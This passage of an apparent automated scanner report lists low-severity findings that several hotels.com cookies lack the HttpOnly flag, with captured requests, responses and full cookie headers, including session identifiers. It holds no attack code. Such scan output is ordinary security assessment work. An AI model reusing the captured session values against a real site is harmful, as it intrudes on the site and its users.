The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /PPCHotelDetails?hotelid=205543&arrivalDate=14/10/2011&departureDate=16/10/2011&adultsPerRoom=2&numberOfRooms=1&view=rates&PRSC=TAJ HTTP/1.1
Host: www.hotels.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.tripadvisor.com/SmartDeals-g60745-Boston_Massachusetts-Hotel-Deals.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: guid=e206d102-4853-4dd2-9d9b-23d14562d0f1; s_vi=[CS]v1|27447E9805012D59-4000010860553A8B[CE]; homepage_search_data="Qm9zdG9uLCBNYXNzYWNodXNldHRzLCBVbml0ZWQgU3RhdGVz//10/04/11//10/07/11//2//MM/dd/yy//"; mvthistory=185.0.0.i1%3A114.1.0%3A124.1.0.i1%3A103.4.1.i6%3A171.1.0%3A130.1.1.i2%3A48.1.0%3A97.73.1.i3%3A98.6.4%3A142.0.0.i4%3A198.2.0%3A145.0.0.i2%3A200.0.0%3A137.0.0.i2%3A108.1.0.i2%3A190.3.0%3A152.0.0.i2%3A134.0.1%3A2.2.1%3A196.1.0%3A209.0.1%3A147.0.1.i6%3A92.0.0.i1%3A132.2.0.i2%3A121.503.0.i7%3A122.1.0.i3%3A138.1.0%3A149.0.0.i1%3A195.0.0%3A104.0.1%7CHCOM_US; __utma=58230453.1140823611.1317600611.1317600611.1317600611.1; __utmz=58230453.1317600611.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; SSLB=1; SSID=BQD8fxscAAAAAAAp_YhOsO4QAin9iE4CAAAAAAAAAAAAiAmJTgCCAAABgwQAAIgJiU4BAIcAAAG0BAAAiAmJTgEA; SSSC=3.G5659051284361178800.2|130.1155:135.1204; SSRT=iAmJTgA; SSPV=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA; SESSID=1E7124089B9B31810B6A337085BAE51F.hm07tc02; channel=DC; user=RCoxODUuMC4wLmkxOjExNC4xLjA6MTI0LjEuMC5pMToxMDMuNC4xLmk2OjE3MS4xLjA6MTMwLjEuMS5pMjo0OC4xLjA6OTcuNzMuMS5pMzo5OC42LjQ6MTQyLjAuMC5pNDoxOTguMi4wOjE0NS4wLjAuaTI6MjAwLjAuMDoxMzcuMC4wLmkyOjEwOC4xLjAuaTI6MTkwLjMuMDoxNTIuMC4wLmkyOjEzNC4wLjE6Mi4yLjE6MTk2LjEuMDoyMDkuMC4xOjE0Ny4wLjEuaTY6OTIuMC4wLmkxOjEzMi4yLjAuaTI6MTIxLjUwMy4wLmk3OjEyMi4xLjAuaTM6MTM4LjEuMDoxNDkuMC4wLmkxOjE5NS4wLjA6MTA0LjAuMXxIQ09NX1VTIUEqZW5fVVN8SENPTV9VUyFFKjEwOTM2OHwwNC8xMC8yMDExfDA3LzEwLzIwMTF8Mg..

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache
X-hcom-ctx: en_US|HCOM_US
Content-Language: en_US
Cache-Control: private, max-age=0, proxy-revalidate, no-store, no-cache, must-revalidate
Expires: Sat, 26 Mar 2011 15:33:11 GMT
Location: http://www.hotels.com/hotel/details.html?tab=prices&destinationId=1401516&destination=Boston%2C+Massachusetts%2C+United+States&hotelId=205543&arrivalDate=10-14-11&departureDate=10-16-11&rooms[0].numberOfAdults=2&roomno=1&validate=false&previousDateful=false&reviewOrder=date_newest_first
Content-Length: 0
Expect:
Content-Type: text/plain; charset=UTF-8
Pragma: no-cache
RTSS: 1
Date: Mon, 03 Oct 2011 01:02:16 GMT
Connection: close
Set-Cookie: SSLB=1; path=/; domain=.hotels.com
Set-Cookie: SSPV=LTwAAAAAAAEAAAAAAAAAAAAAAAEAAAAAAAA; path=/; domain=.hotels.com; expires=Tue, 02-Oct-2012 01:02:16 GMT
Set-Cookie: mvthistory=185.0.0.i1%3A114.1.0%3A124.1.0.i1%3A103.4.1.i6%3A171.1.0%3A130.1.1.i2%3A48.1.0%3A97.73.1.i3%3A98.6.4%3A142.0.0.i4%3A198.2.0%3A145.0.0.i2%3A200.0.0%3A137.0.0.i2%3A108.1.0.i2%3A190.3.0%3A152.0.0.i2%3A134.0.1%3A196.1.0%3A2.2.1%3A209.0.1%3A147.6.0.i6%3A92.0.0.i1%3A121.503.0.i7%3A132.2.0.i2%3A122.1.0.i3%3A138.1.0%3A149.0.0.i1%3A104.0.1%3A195.0.0%7CHCOM_US; Domain=.hotels.com; Expires=Tue, 02-Oct-2012 01:02:16 GMT; Path=/
Set-Cookie: user=QSplbl9VU3xIQ09NX1VTIUQqMTg1LjAuMC5pMToxMTQuMS4wOjEyNC4xLjAuaTE6MTAzLjQuMS5pNjoxNzEuMS4wOjEzMC4xLjEuaTI6NDguMS4wOjk3LjczLjEuaTM6OTguNi40OjE0Mi4wLjAuaTQ6MTk4LjIuMDoxNDUuMC4wLmkyOjIwMC4wLjA6MTM3LjAuMC5pMjoxMDguMS4wLmkyOjE5MC4zLjA6MTUyLjAuMC5pMjoxMzQuMC4xOjE5Ni4xLjA6Mi4yLjE6MjA5LjAuMToxNDcuNi4wLmk2OjkyLjAuMC5pMToxMjEuNTAzLjAuaTc6MTMyLjIuMC5pMjoxMjIuMS4wLmkzOjEzOC4xLjA6MTQ5LjAuMC5pMToxMDQuMC4xOjE5NS4wLjB8SENPTV9VUyFFKjEwOTM2OHwwNC8xMC8yMDExfDA3LzEwLzIwMTF8MjoyMDU1NDN8MTQvMTAvMjAxMXwxNi8xMC8yMDExfDI.; Domain=.hotels.com; Expires=Tue, 02-Oct-2012 01:02:16 GMT; Path=/

14.244. http://www.hotels.com/PPCSearch  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hotels.com
Path:   /PPCSearch

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /PPCSearch?city=Boston,&arrivalDate=04/10/2011&adultsPerRoom=2&numberOfRooms=1&departureDate=07/10/2011 HTTP/1.1
Host: www.hotels.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf?lob=HOTEL&advertiserName=hotels&grp=9702&placeholderUrl=http%3A%2F%2Fwww.travelocity.com%2Fvstrack%3FWA1%3D03020%26WA3%3D742%26WA5%3DDRFContinue%26WA6%3Dair%26dst%3Durl_placeholder&url=http%3A%2F%2Fad.doubleclick.net%2Fclk%3B222113440%3B45762978%3Bg%3Fhttp%3A%2F%2Fwww.hotels.com%2FPPCSearch%3Fcity%3D%24%7Bcity%7D%2C%24%7Bstate%7D%26arrivalDate%3D%24%7BdepartureDate%3Ad%3A%22dd%2Fmm%2Fyyyy%22%7D%26adultsPerRoom%3D2%26numberOfRooms%3D%24%7Brooms%7D%26departureDate%3D%24%7BreturnDate%3Ad%3A%22dd%2Fmm%2Fyyyy%22%7D%26PSRC%3DIGOUGO%26rffrid%3Dmdp.hcom.US.138.160.02&pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&sid=bfa7dd53-c988-458c-86df-52443affccb8&uid=20d9c1fc-61a4-45f0-9524-380e68994c01&widget=H_PopUnder&pti=default&src=none&ppi=4a15630f-e16d-42c4-95d2-0852b73fdd75&ctx=92aa9504-b6eb-4091-8b93-6582f63d9555&ccn=1&cgn=150&pos=3&aii=2fc59ddf-790d-4415-832a-eafa2c6a46cb&%24cc=US&%24rc=US&%24adults=1&%24destination=Boston%2C%20MA%20Massachusetts&%24glsId=440663&%24city=Boston&%24countryn=United%20States&%24countryc=US&%24staten=Massachusetts&%24statec=MA&%24lob=HOTEL&%24rooms=1&%24context=92aa9504-b6eb-4091-8b93-6582f63d9555&%24widget=H_PopUnder&%24l=9&%24departureDate=2011-10-04&%24returnDate=2011-10-07&%24aucnt=0&%24pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&%24sid=bfa7dd53-c988-458c-86df-52443affccb8&adunit=d5332d31-d5c8-59f8-c876-4fee1f31712a&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SSLB=1; SSID=BQBsXxscAAAAAAAp_YhOsO4QAin9iE4BAAAAAAAAAAAAKf2ITgCCAAABgwQAACn9iE4BAIcAAAG0BAAAKf2ITgEA; SSSC=3.G5659051284361178800.1|130.1155:135.1204; SSRT=Kf2ITgA; SSPV=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA; SESSID=44777099D2E37148A35E76005853DABC.hm21tc04; guid=e206d102-4853-4dd2-9d9b-23d14562d0f1; channel=DC; user=QSplbl9VU3xIQ09NX1VT

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache
X-hcom-ctx: en_US|HCOM_US
Content-Language: en_US
Cache-Control: private, max-age=0, proxy-revalidate, no-store, no-cache, must-revalidate
Expires: Sat, 26 Mar 2011 15:31:07 GMT
Location: http://www.hotels.com/search.do?searchParams.arrivalDate=10-04-11&pointName&searchParams.departureDate=10-07-11&lon=0.0&queryFormState=CLOSED&monthCheckOut=10&fromHotelDetails=false&destination=Boston%2C&showSimilarDestinations=true&fromLandmark=false&searchParams.rooms[0].numberOfAdults=2&asaReport&dayInMonthCheckIn=4&fromDisambiguation=false&destinationForLandmark&monthCheckIn=10&activeTab=DESTINATION&dayInMonthCheckOut=7&lat=0.0&rooms=1&ppc=1
Content-Length: 0
Expect:
Content-Type: text/plain; charset=UTF-8
Pragma: no-cache
RTSS: 1
Date: Mon, 03 Oct 2011 00:09:56 GMT
Connection: close
Set-Cookie: SSLB=1; path=/; domain=.hotels.com
Set-Cookie: SSPV=EMAAAAAAAAAAAAAAAAAAAAAAAAEAAAAAAAA; path=/; domain=.hotels.com; expires=Tue, 02-Oct-2012 00:09:56 GMT
Set-Cookie: mvthistory=124.1.0.i1%3A97.73.1.i3%3A98.6.4%3A137.0.0.i2%3A145.0.0.i2%3A108.1.0.i2%3A152.0.0.i2%3A2.2.1%3A196.1.0%3A92.0.0.i1%3A132.2.0.i2%3A121.503.0.i7%3A138.1.0%3A195.0.0%3A104.0.1%7CHCOM_US; Domain=.hotels.com; Expires=Tue, 02-Oct-2012 00:09:56 GMT; Path=/
Set-Cookie: user=QSplbl9VU3xIQ09NX1VTIUQqMTI0LjEuMC5pMTo5Ny43My4xLmkzOjk4LjYuNDoxMzcuMC4wLmkyOjE0NS4wLjAuaTI6MTA4LjEuMC5pMjoxNTIuMC4wLmkyOjIuMi4xOjE5Ni4xLjA6OTIuMC4wLmkxOjEzMi4yLjAuaTI6MTIxLjUwMy4wLmk3OjEzOC4xLjA6MTk1LjAuMDoxMDQuMC4xfEhDT01fVVM.; Domain=.hotels.com; Expires=Tue, 02-Oct-2012 00:09:56 GMT; Path=/

14.245. http://www.hotels.com/compare/hotel_dockingbar.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hotels.com
Path:   /compare/hotel_dockingbar.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /compare/hotel_dockingbar.html?cd=10-04-11&dd=10-07-11&r=2&compare=false&saved=-691979445 HTTP/1.1
Host: www.hotels.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: application/json, text/javascript, */*; q=0.01
Referer: http://www.hotels.com/search.do?searchParams.arrivalDate=10-04-11&pointName&searchParams.departureDate=10-07-11&lon=0.0&queryFormState=CLOSED&monthCheckOut=10&fromHotelDetails=false&destination=Boston%2C&showSimilarDestinations=true&fromLandmark=false&searchParams.rooms[0].numberOfAdults=2&asaReport&dayInMonthCheckIn=4&fromDisambiguation=false&destinationForLandmark&monthCheckIn=10&activeTab=DESTINATION&dayInMonthCheckOut=7&lat=0.0&rooms=1&ppc=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SSID=BQBsXxscAAAAAAAp_YhOsO4QAin9iE4BAAAAAAAAAAAAKf2ITgCCAAABgwQAACn9iE4BAIcAAAG0BAAAKf2ITgEA; SSSC=3.G5659051284361178800.1|130.1155:135.1204; SSRT=Kf2ITgA; SESSID=44777099D2E37148A35E76005853DABC.hm21tc04; guid=e206d102-4853-4dd2-9d9b-23d14562d0f1; channel=DC; SSLB=1; SSPV=EMAAAAAAAAAAAAAAAAAAAAAAAAEAAAAAAAA; homepage_search_data="Qm9zdG9uLA..//10/04/11//10/07/11//2//MM/dd/yy//1643195"; user=RCoxMjQuMS4wLmkxJTNBOTcuNzMuMS5pMyUzQTk4LjYuNCUzQTEzNy4wLjAuaTIlM0ExNDUuMC4wLmkyJTNBMTA4LjEuMC5pMiUzQTE1Mi4wLjAuaTIlM0ExOTYuMS4wJTNBOTIuMC4wLmkxJTNBMTIxLjUwMy4wLmk3JTNBMTk1LjAuMCUzQTEwNC4wLjElN0NIQ09NX1VTIUEqZW5fVVN8SENPTV9VUw..

Response

HTTP/1.1 200 OK
Server: Apache
X-hcom-ctx: en_US|HCOM_US
Content-Language: en-US
Last-Modified: Mon, 03 Oct 2011 00:00:00 GMT
Cache-Control: must-revalidate, proxy-revalidate, max-age=0
Expires: Mon, 03 Oct 2011 00:00:00 GMT
ntCoent-Length: 3650
Expect:
Content-Type: application/json;charset=UTF-8
Content-Length: 3650
Pragma: no-cache
RTSS: 1
Date: Mon, 03 Oct 2011 00:10:09 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: SSLB=1; path=/; domain=.hotels.com
Set-Cookie: SSPV=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA; path=/; domain=.hotels.com; expires=Tue, 02-Oct-2012 00:10:09 GMT
Set-Cookie: mvthistory=124.1.0.i1%3A97.73.1.i3%3A98.6.4%3A137.0.0.i2%3A145.0.0.i2%3A108.1.0.i2%3A152.0.0.i2%3A2.2.1%3A196.1.0%3A92.0.0.i1%3A132.2.0.i2%3A121.503.0.i7%3A138.1.0%3A195.0.0%3A104.0.1%7CHCOM_US; Domain=.hotels.com; Expires=Tue, 02-Oct-2012 00:10:09 GMT; Path=/
Set-Cookie: user=RCoxMjQuMS4wLmkxOjk3LjczLjEuaTM6OTguNi40OjEzNy4wLjAuaTI6MTQ1LjAuMC5pMjoxMDguMS4wLmkyOjE1Mi4wLjAuaTI6Mi4yLjE6MTk2LjEuMDo5Mi4wLjAuaTE6MTMyLjIuMC5pMjoxMjEuNTAzLjAuaTc6MTM4LjEuMDoxOTUuMC4wOjEwNC4wLjF8SENPTV9VUyFBKmVuX1VTfEhDT01fVVM.; Domain=.hotels.com; Expires=Tue, 02-Oct-2012 00:10:09 GMT; Path=/

{
"dockingbarContent": "<div id=\"docking_bar\" class=\"docking_bar closed g rd_docking_bar\" unselectable=\"on\">\n <div class=\"wrapper\">\n <fieldset class=\"recent_hotels\">\n
...[SNIP]...
14.246. http://www.hotels.com/hotel/details.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hotels.com
Path:   /hotel/details.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /hotel/details.html?pa=1&pn=1&ps=1&tab=description&destinationId=1643195&hotelId=109368&arrivalDate=10-04-11&departureDate=10-07-11&rooms[0].numberOfAdults=2&roomno=1&validate=false&previousDateful=false&reviewOrder=date_newest_first HTTP/1.1
Host: www.hotels.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hotels.com/search.do?searchParams.arrivalDate=10-04-11&pointName&searchParams.departureDate=10-07-11&lon=0.0&queryFormState=CLOSED&monthCheckOut=10&fromHotelDetails=false&destination=Boston%2C&showSimilarDestinations=true&fromLandmark=false&searchParams.rooms[0].numberOfAdults=2&asaReport&dayInMonthCheckIn=4&fromDisambiguation=false&destinationForLandmark&monthCheckIn=10&activeTab=DESTINATION&dayInMonthCheckOut=7&lat=0.0&rooms=1&ppc=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SSID=BQBsXxscAAAAAAAp_YhOsO4QAin9iE4BAAAAAAAAAAAAKf2ITgCCAAABgwQAACn9iE4BAIcAAAG0BAAAKf2ITgEA; SSSC=3.G5659051284361178800.1|130.1155:135.1204; SESSID=44777099D2E37148A35E76005853DABC.hm21tc04; guid=e206d102-4853-4dd2-9d9b-23d14562d0f1; channel=DC; homepage_search_data="Qm9zdG9uLA..//10/04/11//10/07/11//2//MM/dd/yy//1643195"; s_cc=true; s_sv_sid=1011730152590; mvthistory=124.1.0.i1%3A97.73.1.i3%3A98.6.4%3A137.0.0.i2%3A145.0.0.i2%3A108.1.0.i2%3A152.0.0.i2%3A2.2.1%3A196.1.0%3A92.0.0.i1%3A132.2.0.i2%3A121.503.0.i7%3A138.1.0%3A195.0.0%3A104.0.1%7CHCOM_US; SSLB=1; user=QSplbl9VU3xIQ09NX1VTIUQqMTI0LjEuMC5pMSUzQTk3LjczLjEuaTMlM0E5OC42LjQlM0ExMzcuMC4wLmkyJTNBMTQ1LjAuMC5pMiUzQTEwOC4xLjAuaTIlM0ExNTIuMC4wLmkyJTNBMTk2LjEuMCUzQTkyLjAuMC5pMSUzQTEyMS41MDMuMC5pNyUzQTE5NS4wLjAlM0ExMDQuMC4xJTdDSENPTV9VUw..; s_vi=[CS]v1|27447E9805012D59-4000010860553A8B[CE]; __utma=58230453.1140823611.1317600611.1317600611.1317600611.1; __utmb=58230453.1.10.1317600611; __utmc=58230453; __utmz=58230453.1317600611.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; s_sq=hotelsusprod%2Chotelsallprod%3D%2526pid%253Dsearch%252520result%252520with%252520dates%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.hotels.com%25252Fhotel%25252Fdetails.html%25253Fpa%25253D1%252526pn%25253D1%252526ps%25253D1%252526tab%25253Ddescription%252526destinationId%25253D1643195%252526hotelI%2526ot%253DA; SSRT=oQGJTgA; SSPV=RcAAAAAAAAAAAAAAAAAAAAAAAAQAAAAAAAA

Response

HTTP/1.1 200 OK
Server: Apache
X-hcom-ctx: en_US|HCOM_US
Content-Language: en-US
Cache-Control: private, max-age=0, proxy-revalidate, no-store, no-cache, must-revalidate
Expires: Sat, 26 Mar 2011 15:31:07 GMT
Expect:
Content-Type: text/html;charset=UTF-8
Pragma: no-cache
RTSS: 1
Vary: Accept-Encoding
Date: Mon, 03 Oct 2011 00:28:20 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: SSLB=1; path=/; domain=.hotels.com
Set-Cookie: SSPV=H7gAAAAAAAIAAAAAAAAAAAAAAAYAAAAAAAA; path=/; domain=.hotels.com; expires=Tue, 02-Oct-2012 00:28:19 GMT
Set-Cookie: homepage_search_data="Qm9zdG9uLCBNYXNzYWNodXNldHRzLCBVbml0ZWQgU3RhdGVz//10/04/11//10/07/11//2//MM/dd/yy//"; Version=1; Domain=.hotels.com; Max-Age=31536000; Expires=Tue, 02-Oct-2012 00:28:19 GMT; Path=/
Set-Cookie: user=QSplbl9VU3xIQ09NX1VTIUQqMTI0LjEuMC5pMSUzQTk3LjczLjEuaTMlM0E5OC42LjQlM0ExMzcuMC4wLmkyJTNBMTQ1LjAuMC5pMiUzQTEwOC4xLjAuaTIlM0ExNTIuMC4wLmkyJTNBMTk2LjEuMCUzQTkyLjAuMC5pMSUzQTEyMS41MDMuMC5pNyUzQTE5NS4wLjAlM0ExMDQuMC4xJTdDSENPTV9VUyFFKjEwOTM2OHwwNC8xMC8yMDExfDA3LzEwLzIwMTF8MiFGKg..; Domain=.hotels.com; Expires=Tue, 02-Oct-2012 00:28:19 GMT; Path=/
Content-Length: 238921

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xmlns:
...[SNIP]...
14.247. http://www.hotels.com/hotel/hoteldata.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hotels.com
Path:   /hotel/hoteldata.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /hotel/hoteldata.html?destinationId=1401516&hotelId=109368&arrivalDate=10-04-11&departureDate=10-07-11&rooms[0].numberOfAdults=2&validate=false&previousDateful=false&nightlyPrice=289%2CUSD&dateful=true HTTP/1.1
Host: www.hotels.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: application/xml, text/xml, */*; q=0.01
Referer: http://www.hotels.com/hotel/details.html?pa=1&pn=1&ps=1&tab=description&destinationId=1643195&hotelId=109368&arrivalDate=10-04-11&departureDate=10-07-11&rooms[0].numberOfAdults=2&roomno=1&validate=false&previousDateful=false&reviewOrder=date_newest_first
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SSID=BQBsXxscAAAAAAAp_YhOsO4QAin9iE4BAAAAAAAAAAAAKf2ITgCCAAABgwQAACn9iE4BAIcAAAG0BAAAKf2ITgEA; SSSC=3.G5659051284361178800.1|130.1155:135.1204; SESSID=44777099D2E37148A35E76005853DABC.hm21tc04; guid=e206d102-4853-4dd2-9d9b-23d14562d0f1; channel=DC; s_cc=true; s_sv_sid=1011730152590; mvthistory=124.1.0.i1%3A97.73.1.i3%3A98.6.4%3A137.0.0.i2%3A145.0.0.i2%3A108.1.0.i2%3A152.0.0.i2%3A2.2.1%3A196.1.0%3A92.0.0.i1%3A132.2.0.i2%3A121.503.0.i7%3A138.1.0%3A195.0.0%3A104.0.1%7CHCOM_US; s_vi=[CS]v1|27447E9805012D59-4000010860553A8B[CE]; __utma=58230453.1140823611.1317600611.1317600611.1317600611.1; __utmb=58230453.1.10.1317600611; __utmc=58230453; __utmz=58230453.1317600611.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; s_sq=hotelsusprod%2Chotelsallprod%3D%2526pid%253Dsearch%252520result%252520with%252520dates%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.hotels.com%25252Fhotel%25252Fdetails.html%25253Fpa%25253D1%252526pn%25253D1%252526ps%25253D1%252526tab%25253Ddescription%252526destinationId%25253D1643195%252526hotelI%2526ot%253DA; SSRT=oQGJTgA; SSLB=1; homepage_search_data="Qm9zdG9uLCBNYXNzYWNodXNldHRzLCBVbml0ZWQgU3RhdGVz//10/04/11//10/07/11//2//MM/dd/yy//"; user=RCoxMjQuMS4wLmkxJTNBOTcuNzMuMS5pMyUzQTk4LjYuNCUzQTEzNy4wLjAuaTIlM0ExNDUuMC4wLmkyJTNBMTA4LjEuMC5pMiUzQTE1Mi4wLjAuaTIlM0ExOTYuMS4wJTNBOTIuMC4wLmkxJTNBMTIxLjUwMy4wLmk3JTNBMTk1LjAuMCUzQTEwNC4wLjElN0NIQ09NX1VTIUEqZW5fVVN8SENPTV9VUyFFKjEwOTM2OHwwNC8xMC8yMDExfDA3LzEwLzIwMTF8MiFGKg..; SSPV=W_wAAAAAAAEAAAAAAAAAAAAAAAYAAAAAAAA

Response

HTTP/1.1 200 OK
Server: Apache
X-hcom-ctx: en_US|HCOM_US
Content-Language: en-US
Cache-Control: private, max-age=0, proxy-revalidate, no-store, no-cache, must-revalidate
Expires: Sat, 26 Mar 2011 15:33:11 GMT
Expect:
Content-Type: text/xml;charset=UTF-8
Pragma: no-cache
RTSS: 1
Content-Length: 12556
Date: Mon, 03 Oct 2011 00:28:57 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: mvthistory=103.4.1.i6%3A132.2.0.i2%7CHCOM_US; Domain=.hotels.com; Expires=Tue, 02-Oct-2012 00:28:56 GMT; Path=/
Set-Cookie: user=QSplbl9VU3xIQ09NX1VTIUQqMTAzLjQuMS5pNjoxMzIuMi4wLmkyfEhDT01fVVMhRSoxMDkzNjh8MDQvMTAvMjAxMXwwNy8xMC8yMDExfDI.; Domain=.hotels.com; Expires=Tue, 02-Oct-2012 00:28:57 GMT; Path=/

<additional-hotel-data>
<trip-advisor>
<ta-reviews-trigger>
<![CDATA[
<h4 class="property_details_reviews_third_party_title">
TripAdvisor reviews for Omni Parker House</h
...[SNIP]...
14.248. http://www.hotels.com/hoteldetails/urgencypopup.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hotels.com
Path:   /hoteldetails/urgencypopup.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /hoteldetails/urgencypopup.html?hotelId=109368 HTTP/1.1
Host: www.hotels.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html, */*; q=0.01
Referer: http://www.hotels.com/hotel/details.html?pa=1&pn=1&ps=1&tab=description&destinationId=1643195&hotelId=109368&arrivalDate=10-04-11&departureDate=10-07-11&rooms[0].numberOfAdults=2&roomno=1&validate=false&previousDateful=false&reviewOrder=date_newest_first
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SSID=BQBsXxscAAAAAAAp_YhOsO4QAin9iE4BAAAAAAAAAAAAKf2ITgCCAAABgwQAACn9iE4BAIcAAAG0BAAAKf2ITgEA; SSSC=3.G5659051284361178800.1|130.1155:135.1204; SESSID=44777099D2E37148A35E76005853DABC.hm21tc04; guid=e206d102-4853-4dd2-9d9b-23d14562d0f1; channel=DC; s_cc=true; s_sv_sid=1011730152590; mvthistory=124.1.0.i1%3A97.73.1.i3%3A98.6.4%3A137.0.0.i2%3A145.0.0.i2%3A108.1.0.i2%3A152.0.0.i2%3A2.2.1%3A196.1.0%3A92.0.0.i1%3A132.2.0.i2%3A121.503.0.i7%3A138.1.0%3A195.0.0%3A104.0.1%7CHCOM_US; s_vi=[CS]v1|27447E9805012D59-4000010860553A8B[CE]; __utma=58230453.1140823611.1317600611.1317600611.1317600611.1; __utmb=58230453.1.10.1317600611; __utmc=58230453; __utmz=58230453.1317600611.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; s_sq=hotelsusprod%2Chotelsallprod%3D%2526pid%253Dsearch%252520result%252520with%252520dates%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.hotels.com%25252Fhotel%25252Fdetails.html%25253Fpa%25253D1%252526pn%25253D1%252526ps%25253D1%252526tab%25253Ddescription%252526destinationId%25253D1643195%252526hotelI%2526ot%253DA; SSRT=oQGJTgA; SSLB=1; homepage_search_data="Qm9zdG9uLCBNYXNzYWNodXNldHRzLCBVbml0ZWQgU3RhdGVz//10/04/11//10/07/11//2//MM/dd/yy//"; user=RCoxMjQuMS4wLmkxJTNBOTcuNzMuMS5pMyUzQTk4LjYuNCUzQTEzNy4wLjAuaTIlM0ExNDUuMC4wLmkyJTNBMTA4LjEuMC5pMiUzQTE1Mi4wLjAuaTIlM0ExOTYuMS4wJTNBOTIuMC4wLmkxJTNBMTIxLjUwMy4wLmk3JTNBMTk1LjAuMCUzQTEwNC4wLjElN0NIQ09NX1VTIUEqZW5fVVN8SENPTV9VUyFFKjEwOTM2OHwwNC8xMC8yMDExfDA3LzEwLzIwMTF8MiFGKg..; SSPV=W_wAAAAAAAEAAAAAAAAAAAAAAAYAAAAAAAA

Response

HTTP/1.1 200 OK
Server: Apache
X-hcom-ctx: en_US|HCOM_US
Content-Language: en-US
Cache-Control: private, max-age=0, proxy-revalidate, no-store, no-cache, must-revalidate
Expires: Sat, 26 Mar 2011 15:31:07 GMT
